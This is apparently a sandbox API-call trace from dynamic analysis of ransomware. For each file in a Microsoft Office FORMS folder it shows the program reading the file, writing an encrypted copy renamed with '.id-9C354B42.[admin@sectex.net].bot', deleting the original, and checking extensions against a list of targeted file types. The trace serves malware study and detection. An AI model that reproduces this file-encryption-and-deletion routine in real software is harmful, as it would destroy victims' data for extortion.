	[0162.860] lstrlenW (lpString=".jpg") returned 4
	[0162.860] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0162.860] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0162.860] lstrlenW (lpString="RESENDL.ICO") returned 11
	[0162.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resendl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.861] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1078) returned 1
	[0162.861] CloseHandle (hObject=0x3f0) returned 1
	[0162.861] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resendl.ico")) returned 0x20
	[0162.861] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resendl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resendl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.861] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.862] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resendl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0162.862] GetLastError () returned 0x0
	[0162.862] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x436, lpOverlapped=0x0) returned 1
	[0162.867] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0162.867] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.867] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0162.868] SetEndOfFile (hFile=0x3c4) returned 1
	[0162.868] CloseHandle (hObject=0x3c4) returned 1
	[0162.868] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.868] SetEndOfFile (hFile=0x3f0) returned 1
	[0162.870] CloseHandle (hObject=0x3f0) returned 1
	[0162.870] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.870] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resendl.ico")) returned 1
	[0162.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO") returned 65
	[0162.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO") returned 65
	[0162.871] lstrlenW (lpString=".doc") returned 4
	[0162.871] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0162.871] lstrlenW (lpString=".docx") returned 5
	[0162.871] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0162.871] lstrlenW (lpString=".pdf") returned 4
	[0162.871] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0162.871] lstrlenW (lpString=".xls") returned 4
	[0162.871] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0162.871] lstrlenW (lpString=".xlsx") returned 5
	[0162.871] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0162.871] lstrlenW (lpString=".ppt") returned 4
	[0162.871] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0162.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO") returned 65
	[0162.871] lstrlenW (lpString=".zip") returned 4
	[0162.871] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0162.871] lstrlenW (lpString=".rar") returned 4
	[0162.871] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0162.872] lstrlenW (lpString=".bz2") returned 4
	[0162.872] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0162.872] lstrlenW (lpString=".7z") returned 3
	[0162.872] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0162.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO") returned 65
	[0162.872] lstrlenW (lpString=".dbf") returned 4
	[0162.872] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0162.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO") returned 65
	[0162.872] lstrlenW (lpString=".1cd") returned 4
	[0162.872] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0162.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO") returned 65
	[0162.872] lstrlenW (lpString=".jpg") returned 4
	[0162.872] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0162.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO") returned 65
	[0162.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO") returned 65
	[0162.872] lstrlenW (lpString=".doc") returned 4
	[0162.872] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0162.872] lstrlenW (lpString=".docx") returned 5
	[0162.872] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0162.872] lstrlenW (lpString=".pdf") returned 4
	[0162.872] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0162.872] lstrlenW (lpString=".xls") returned 4
	[0162.872] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0162.872] lstrlenW (lpString=".xlsx") returned 5
	[0162.872] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0162.872] lstrlenW (lpString=".ppt") returned 4
	[0162.872] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0162.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO") returned 65
	[0162.872] lstrlenW (lpString=".zip") returned 4
	[0162.872] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0162.872] lstrlenW (lpString=".rar") returned 4
	[0162.872] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0162.872] lstrlenW (lpString=".bz2") returned 4
	[0162.872] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0162.873] lstrlenW (lpString=".7z") returned 3
	[0162.873] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0162.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO") returned 65
	[0162.873] lstrlenW (lpString=".dbf") returned 4
	[0162.873] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0162.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO") returned 65
	[0162.873] lstrlenW (lpString=".1cd") returned 4
	[0162.873] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0162.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDL.ICO") returned 65
	[0162.873] lstrlenW (lpString=".jpg") returned 4
	[0162.873] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0162.873] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0162.873] lstrlenW (lpString="RESENDS.ICO") returned 11
	[0162.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resends.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.874] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2998) returned 1
	[0162.874] CloseHandle (hObject=0x3f0) returned 1
	[0162.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resends.ico")) returned 0x20
	[0162.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resends.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resends.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0162.874] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.874] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resends.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0162.875] GetLastError () returned 0x0
	[0162.875] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0162.876] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0162.877] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.877] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0162.877] SetEndOfFile (hFile=0x3c4) returned 1
	[0162.877] CloseHandle (hObject=0x3c4) returned 1
	[0162.877] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.877] SetEndOfFile (hFile=0x3f0) returned 1
	[0162.879] CloseHandle (hObject=0x3f0) returned 1
	[0162.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.880] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\resends.ico")) returned 1
	[0162.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO") returned 65
	[0162.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO") returned 65
	[0162.880] lstrlenW (lpString=".doc") returned 4
	[0162.880] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0162.880] lstrlenW (lpString=".docx") returned 5
	[0162.880] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0162.880] lstrlenW (lpString=".pdf") returned 4
	[0162.880] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0162.880] lstrlenW (lpString=".xls") returned 4
	[0162.880] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0162.880] lstrlenW (lpString=".xlsx") returned 5
	[0162.880] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0162.880] lstrlenW (lpString=".ppt") returned 4
	[0162.880] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0162.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO") returned 65
	[0162.880] lstrlenW (lpString=".zip") returned 4
	[0162.881] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0162.881] lstrlenW (lpString=".rar") returned 4
	[0162.881] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0162.881] lstrlenW (lpString=".bz2") returned 4
	[0162.881] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0162.881] lstrlenW (lpString=".7z") returned 3
	[0162.881] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0162.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO") returned 65
	[0162.881] lstrlenW (lpString=".dbf") returned 4
	[0162.881] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0162.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO") returned 65
	[0162.881] lstrlenW (lpString=".1cd") returned 4
	[0162.881] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0162.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO") returned 65
	[0162.881] lstrlenW (lpString=".jpg") returned 4
	[0162.881] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0162.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO") returned 65
	[0162.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO") returned 65
	[0162.881] lstrlenW (lpString=".doc") returned 4
	[0162.881] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0162.881] lstrlenW (lpString=".docx") returned 5
	[0162.881] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0162.881] lstrlenW (lpString=".pdf") returned 4
	[0162.881] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0162.881] lstrlenW (lpString=".xls") returned 4
	[0162.881] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0162.881] lstrlenW (lpString=".xlsx") returned 5
	[0162.881] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0162.881] lstrlenW (lpString=".ppt") returned 4
	[0162.881] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0162.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO") returned 65
	[0162.881] lstrlenW (lpString=".zip") returned 4
	[0162.881] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0162.882] lstrlenW (lpString=".rar") returned 4
	[0162.882] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0162.882] lstrlenW (lpString=".bz2") returned 4
	[0162.882] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0162.882] lstrlenW (lpString=".7z") returned 3
	[0162.882] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0162.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO") returned 65
	[0162.882] lstrlenW (lpString=".dbf") returned 4
	[0162.882] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0162.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO") returned 65
	[0162.882] lstrlenW (lpString=".1cd") returned 4
	[0162.882] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0162.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RESENDS.ICO") returned 65
	[0162.882] lstrlenW (lpString=".jpg") returned 4
	[0162.882] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0162.882] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0162.882] lstrlenW (lpString="RSSITEM.CFG") returned 11
	[0162.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitem.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.033] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=788) returned 1
	[0163.033] CloseHandle (hObject=0x37c) returned 1
	[0163.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitem.cfg")) returned 0x20
	[0163.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitem.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitem.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0163.118] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.127] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitem.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0163.148] GetLastError () returned 0x0
	[0163.148] ReadFile (in: hFile=0x3b8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x314, lpOverlapped=0x0) returned 1
	[0163.175] WriteFile (in: hFile=0x25c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x320, lpOverlapped=0x0) returned 1
	[0163.176] ReadFile (in: hFile=0x3b8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.176] WriteFile (in: hFile=0x25c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0163.176] SetEndOfFile (hFile=0x25c) returned 1
	[0163.460] CloseHandle (hObject=0x25c) returned 1
	[0163.695] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.705] SetEndOfFile (hFile=0x3b8) returned 1
	[0163.707] CloseHandle (hObject=0x3b8) returned 1
	[0163.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.708] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssitem.cfg")) returned 1
	[0163.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG") returned 65
	[0163.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG") returned 65
	[0163.708] lstrlenW (lpString=".doc") returned 4
	[0163.708] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0163.708] lstrlenW (lpString=".docx") returned 5
	[0163.709] lstrcmpiW (lpString1=".docx", lpString2="M.CFG") returned -1
	[0163.709] lstrlenW (lpString=".pdf") returned 4
	[0163.709] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0163.709] lstrlenW (lpString=".xls") returned 4
	[0163.709] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0163.709] lstrlenW (lpString=".xlsx") returned 5
	[0163.709] lstrcmpiW (lpString1=".xlsx", lpString2="M.CFG") returned -1
	[0163.709] lstrlenW (lpString=".ppt") returned 4
	[0163.709] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0163.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG") returned 65
	[0163.709] lstrlenW (lpString=".zip") returned 4
	[0163.709] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0163.709] lstrlenW (lpString=".rar") returned 4
	[0163.709] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0163.709] lstrlenW (lpString=".bz2") returned 4
	[0163.709] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0163.709] lstrlenW (lpString=".7z") returned 3
	[0163.709] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0163.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG") returned 65
	[0163.709] lstrlenW (lpString=".dbf") returned 4
	[0163.709] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0163.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG") returned 65
	[0163.709] lstrlenW (lpString=".1cd") returned 4
	[0163.709] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0163.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG") returned 65
	[0163.709] lstrlenW (lpString=".jpg") returned 4
	[0163.709] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0163.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG") returned 65
	[0163.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG") returned 65
	[0163.709] lstrlenW (lpString=".doc") returned 4
	[0163.709] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0163.709] lstrlenW (lpString=".docx") returned 5
	[0163.709] lstrcmpiW (lpString1=".docx", lpString2="M.CFG") returned -1
	[0163.709] lstrlenW (lpString=".pdf") returned 4
	[0163.710] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0163.710] lstrlenW (lpString=".xls") returned 4
	[0163.710] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0163.710] lstrlenW (lpString=".xlsx") returned 5
	[0163.710] lstrcmpiW (lpString1=".xlsx", lpString2="M.CFG") returned -1
	[0163.710] lstrlenW (lpString=".ppt") returned 4
	[0163.710] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0163.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG") returned 65
	[0163.710] lstrlenW (lpString=".zip") returned 4
	[0163.710] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0163.710] lstrlenW (lpString=".rar") returned 4
	[0163.710] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0163.710] lstrlenW (lpString=".bz2") returned 4
	[0163.710] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0163.710] lstrlenW (lpString=".7z") returned 3
	[0163.710] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0163.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG") returned 65
	[0163.710] lstrlenW (lpString=".dbf") returned 4
	[0163.710] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0163.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG") returned 65
	[0163.710] lstrlenW (lpString=".1cd") returned 4
	[0163.710] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0163.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEM.CFG") returned 65
	[0163.710] lstrlenW (lpString=".jpg") returned 4
	[0163.710] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0163.710] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0163.710] lstrlenW (lpString="RSSITEMS.ICO") returned 12
